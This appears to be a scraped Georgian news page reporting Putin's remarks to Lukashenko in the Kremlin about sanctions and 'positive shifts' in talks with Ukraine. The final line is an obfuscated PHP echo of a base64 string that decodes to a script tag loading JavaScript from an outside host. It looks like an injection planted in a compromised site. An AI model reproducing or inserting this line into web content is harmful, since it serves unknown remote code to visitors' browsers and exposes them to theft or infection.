celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტის ვლადიმერ პუტინის განცხადებით, უკრაინასთან მიმართებაში პოზიტიური ძვრებია. ამის შესახებ პუტინმა ბელარუსის პრეზიდენტთან შეხვედრაზე განაცხადა.
 
"რა თქმა უნდა არსებობს პრობლემები რომმლებიც დღევანდელ მოვლენებს უკავშირდება ეს არის შეზღუდვები და სანქციები, მაგრამ როგორც ადრე უკვე ვთქვით, ისინი ყოველთვის გვიწესებდნენ სანქციებს. ახლა რა თქმა უნდა ეს უფრო მასშტაბურია, დარწმუნებული ვარ რომ ამ სირთულეს გადავლახავთ და პირიქით შევიძენთ უფრო მეტ კომპეტენციას და შესაძლებლობას რომ თავი ვიგრძნოთ უფრო დამოუკიდებლად. საბოლოოდ შედეგი სარგებლის მომტანი იქნება. მე მოგაწვდით ინფორმაციას უკრაინული მიმართულებით თუ როგორ მიმდინარეობს მოლაპარაკებები. არის პოზიტიური ძვრები, როგორც ჩვენი მომლაპარაკებლები მეუბნებიან," - განაცხადა პუტინმა ბელარუსის პრეზიდენტთან შეხვედრაზე.
 
ალექსანდრ ლუკაშენკო პუტინს კრემლში თავად ეწვია. 
1340
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");